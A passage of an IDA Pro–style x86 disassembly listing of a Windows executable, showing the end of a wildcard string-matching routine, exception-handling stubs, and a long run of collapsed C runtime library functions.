mov eax, [eax]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx], eax
jmp short loc_4109BE
; ---------------------------------------------------------------------------
loc_410A09: ; CODE XREF: sub_4109A7+21�j
; sub_4109A7+3B�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_410A23
mov eax, [ebp+arg_0]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx], eax
jmp short loc_410A09
; ---------------------------------------------------------------------------
loc_410A23: ; CODE XREF: sub_4109A7+6D�j
mov eax, [ebp+arg_4]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_410A47
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_410A47
and [ebp+var_4], 0
mov eax, [ebp+var_4]
jmp locret_410B2F
; ---------------------------------------------------------------------------
loc_410A47: ; CODE XREF: sub_4109A7+86�j
; sub_4109A7+92�j
mov eax, [ebp+arg_4]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_410A6E
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_410A6E
mov [ebp+var_4], 1
mov eax, [ebp+var_4]
jmp locret_410B2F
; ---------------------------------------------------------------------------
loc_410A6E: ; CODE XREF: sub_4109A7+AA�j
; sub_4109A7+B6�j
mov eax, [ebp+arg_4]
push dword ptr [eax]
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_41078E
pop ecx
pop ecx
test eax, eax
jnz loc_410B0D
loc_410A87: ; CODE XREF: sub_4109A7+160�j
mov eax, [ebp+arg_4]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_410A92: ; CODE XREF: sub_4109A7+123�j
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
mov ecx, [ecx]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_410ACC
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
cmp eax, 5Bh
jz short loc_410ACC
mov eax, [ebp+arg_4]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_410ACC
mov eax, [ebp+arg_4]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_410A92
; ---------------------------------------------------------------------------
loc_410ACC: ; CODE XREF: sub_4109A7+FD�j
; sub_4109A7+10A�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_410AF3
mov eax, [ebp+arg_4]
push dword ptr [eax]
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_41078E
pop ecx
pop ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_8], eax
jmp short loc_410B03
; ---------------------------------------------------------------------------
loc_410AF3: ; CODE XREF: sub_4109A7+12F�j
and [ebp+var_4], 0
xor eax, eax
cmp [ebp+var_4], 0
setnz al
mov [ebp+var_8], eax
loc_410B03: ; CODE XREF: sub_4109A7+14A�j
cmp [ebp+var_8], 0
jnz loc_410A87
loc_410B0D: ; CODE XREF: sub_4109A7+DA�j
mov eax, [ebp+arg_4]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_410B2C
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_410B2C
mov [ebp+var_4], 1
loc_410B2C: ; CODE XREF: sub_4109A7+170�j
; sub_4109A7+17C�j
mov eax, [ebp+var_4]
locret_410B2F: ; CODE XREF: sub_4109A7+9B�j
; sub_4109A7+C2�j
leave
retn
sub_4109A7 endp
; [0000002A BYTES: COLLAPSED FUNCTION _wcscat. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000052 BYTES: COLLAPSED FUNCTION _sprintf. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; [000000CF BYTES: COLLAPSED FUNCTION _floor. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __fpmath. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __cfltcvt_init. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000027 BYTES: COLLAPSED FUNCTION __ftol. PRESS KEYPAD "+" TO EXPAND]
; [000000CF BYTES: COLLAPSED FUNCTION _ceil. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION _JumpToContinuation(void *,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; [00000007 BYTES: COLLAPSED FUNCTION sub_4112E6. PRESS KEYPAD "+" TO EXPAND]
; [00000007 BYTES: COLLAPSED FUNCTION sub_4112ED. PRESS KEYPAD "+" TO EXPAND]
; [0000004F BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION ___CxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
; [00000054 BYTES: COLLAPSED FUNCTION _CallCatchBlock2(EHRegistrationNode *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; [00000025 BYTES: COLLAPSED FUNCTION CatchGuardHandler(EHExceptionRecord *,CatchGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
; [000000B4 BYTES: COLLAPSED FUNCTION _CallSETranslator(EHExceptionRecord *,EHRegistrationNode *,void *,void *,_s_FuncInfo const *,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION TranslatorGuardHandler(EHExceptionRecord *,TranslatorGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *). PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __NLG_Notify1. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 4
; [0000001F BYTES: COLLAPSED FUNCTION __EH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __snprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION operator delete(void *). PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [0000006D BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND]
; [00000208 BYTES: COLLAPSED FUNCTION _strtoxl. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _strtoul. PRESS KEYPAD "+" TO EXPAND]
; [0000008B BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION _atoi. PRESS KEYPAD "+" TO EXPAND]
; [00000034 BYTES: COLLAPSED FUNCTION _sscanf. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
; [000000E8 BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
; [00000158 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
; [0000008C BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
; [00000020 BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000038 BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000123 BYTES: COLLAPSED FUNCTION _strncat. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_412333 proc near ; CODE XREF: sub_404F31+1B9�p
; sub_405759+45�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_423A60, eax
retn
sub_412333 endp
; [0000001E BYTES: COLLAPSED FUNCTION _rand. PRESS KEYPAD "+" TO EXPAND]
; [000000DC BYTES: COLLAPSED FUNCTION _time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [000000CB BYTES: COLLAPSED FUNCTION _tolower. PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __aullrem. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
; [00000050 BYTES: COLLAPSED FUNCTION __vsnprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION _memcmp. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION __splitpath. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000027 BYTES: COLLAPSED FUNCTION _strrchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BC BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
; [000000D7 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call __exit
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [00000023 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
retn
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [0000032B BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002F6 BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; [00000115 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000721 BYTES: COLLAPSED FUNCTION __output. PRESS KEYPAD "+" TO EXPAND]
off_414267 dd offset $NORMAL_STATE$1535 ; DATA XREF: __output+6E�r
dd offset loc_413BBB ; jump table for switch statement
dd offset loc_413BD6
dd offset loc_413C22
dd offset loc_413C59
dd offset loc_413C61
dd offset loc_413C96
dd offset loc_413D29
; [00000035 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
; [0000000D BYTES: COLLAPSED FUNCTION _get_int_arg. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION _get_int64_arg. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION _get_short_arg. PRESS KEYPAD "+" TO EXPAND]
; [00000053 BYTES: COLLAPSED FUNCTION __handle_qnan1. PRESS KEYPAD "+" TO EXPAND]
; [00000098 BYTES: COLLAPSED FUNCTION __except1. PRESS KEYPAD "+" TO EXPAND]
; [000002B3 BYTES: COLLAPSED FUNCTION __raise_exc. PRESS KEYPAD "+" TO EXPAND]
; [00000217 BYTES: COLLAPSED FUNCTION __handle_exc. PRESS KEYPAD "+" TO EXPAND]
; [00000088 BYTES: COLLAPSED FUNCTION __umatherr. PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION __set_errno. PRESS KEYPAD "+" TO EXPAND]
; [00000025 BYTES: COLLAPSED FUNCTION __get_fname. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __errcode. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION __frnd. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __set_exp. PRESS KEYPAD "+" TO EXPAND]
; [0000005A BYTES: COLLAPSED FUNCTION __sptype. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION __decomp. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION __statfp. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __clrfp. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __ctrlfp. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION __set_statfp. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION __ms_p5_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __ms_p5_mp_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [0000005A BYTES: COLLAPSED FUNCTION __forcdecpt. PRESS KEYPAD "+" TO EXPAND]
; [0000004E BYTES: COLLAPSED FUNCTION __cropzeros. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __positive. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION __fassign. PRESS KEYPAD "+" TO EXPAND]
; [00000104 BYTES: COLLAPSED FUNCTION __cftoe. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION __cftof. PRESS KEYPAD "+" TO EXPAND]
; [0000009B BYTES: COLLAPSED FUNCTION __cftog. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __cftoe_g. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __cftof_g. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __cfltcvt. PRESS KEYPAD "+" TO EXPAND]
; [00000025 BYTES: COLLAPSED FUNCTION __shift. PRESS KEYPAD "+" TO EXPAND]
; [0000009B BYTES: COLLAPSED FUNCTION ___InternalCxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
; [000001A7 BYTES: COLLAPSED FUNCTION FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [000000A8 BYTES: COLLAPSED FUNCTION FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION TypeMatch(_s_HandlerType const *,_s_CatchableType const *,_s_ThrowInfo const *). PRESS KEYPAD "+" TO EXPAND]
; [0000009E BYTES: COLLAPSED FUNCTION ___FrameUnwindToState. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION unknown_libname_3. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION CatchIt(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,_s_HandlerType const *,_s_CatchableType const *,_s_TryBlockMapEntry const *,int,EHRegistrationNode *,uchar). PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4155B7 proc near ; DATA XREF: .rdata:0041C408�o
push dword ptr [ebp-14h] ; struct _EXCEPTION_POINTERS *
call ?ExFilterRethrow@@YAHPAU_EXCEPTION_POINTERS@@@Z ; ExFilterRethrow(_EXCEPTION_POINTERS *)
pop ecx
retn
sub_4155B7 endp
; =============== S U B R O U T I N E =======================================
sub_4155C1 proc near ; DATA XREF: .rdata:0041C40C�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call __local_unwind2
pop ecx
pop ecx
xor eax, eax
jmp short loc_4155A8
sub_4155C1 endp
; =============== S U B R O U T I N E =======================================
sub_4155D9 proc near ; DATA XREF: .rdata:0041C400�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_4155D9 endp ; sp-analysis failed
; [00000046 BYTES: COLLAPSED FUNCTION sub_4155E1. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION ExFilterRethrow(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
; [000001B8 BYTES: COLLAPSED FUNCTION BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_4158EC
; [00000056 BYTES: COLLAPSED FUNCTION unknown_libname_4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_4158EC
; [00000023 BYTES: COLLAPSED FUNCTION AdjustPointer(void *,PMD const &). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004C BYTES: COLLAPSED FUNCTION unknown_libname_5. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION sub_4158EC. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_415942 proc near ; CODE XREF: _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *)+23�p
; _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *):loc_411586�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C448
push offset unknown_libname_7 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_423BC4
test eax, eax
jz short loc_41598A
mov [ebp+var_4], 1
call eax ; sub_4158EC
jmp short loc_415986
; ---------------------------------------------------------------------------
loc_41597F: ; DATA XREF: .rdata:0041C458�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_415983: ; DATA XREF: .rdata:0041C45C�o
mov esp, [ebp+var_18]
loc_415986: ; CODE XREF: sub_415942+3B�j
and [ebp+var_4], 0
loc_41598A: ; CODE XREF: sub_415942+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_415993: ; DATA XREF: .rdata:0041C450�o
jmp sub_4158EC
sub_415942 endp
; [00000120 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [000000CC BYTES: COLLAPSED FUNCTION _toupper. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; [00000A25 BYTES: COLLAPSED FUNCTION __input. PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION __hextodec. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION _fgetc. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __un_inc. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION __whiteout. PRESS KEYPAD "+" TO EXPAND]
; [000000B3 BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
; [0000005C BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41688A proc near ; CODE XREF: ___endstdio�p
push 1
call _flsall
pop ecx
retn
sub_41688A endp
; [0000006D BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; [000000D9 BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
; [000001F6 BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; [0000009A BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
; [00000170 BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
; [00000078 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [000000C2 BYTES: COLLAPSED FUNCTION ___loctotime_t. PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [00000199 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [00000185 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [0000008A BYTES: COLLAPSED FUNCTION __mbsnbcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000141 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [000001B4 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_8: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000153 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [000001AD BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
; [00000044 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
; [000000A5 BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_418330 proc near ; CODE XREF: __umatherr+52�p
xor eax, eax
retn
sub_418330 endp
; [00000035 BYTES: COLLAPSED FUNCTION __control87. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION __controlfp. PRESS KEYPAD "+" TO EXPAND]
; [00000092 BYTES: COLLAPSED FUNCTION __abstract_cw. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION __hw_cw. PRESS KEYPAD "+" TO EXPAND]
; [00000049 BYTES: COLLAPSED FUNCTION __ZeroTail. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION __IncMan. PRESS KEYPAD "+" TO EXPAND]
; [0000008C BYTES: COLLAPSED FUNCTION __RoundMan. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __CopyMan. PRESS KEYPAD "+" TO EXPAND]
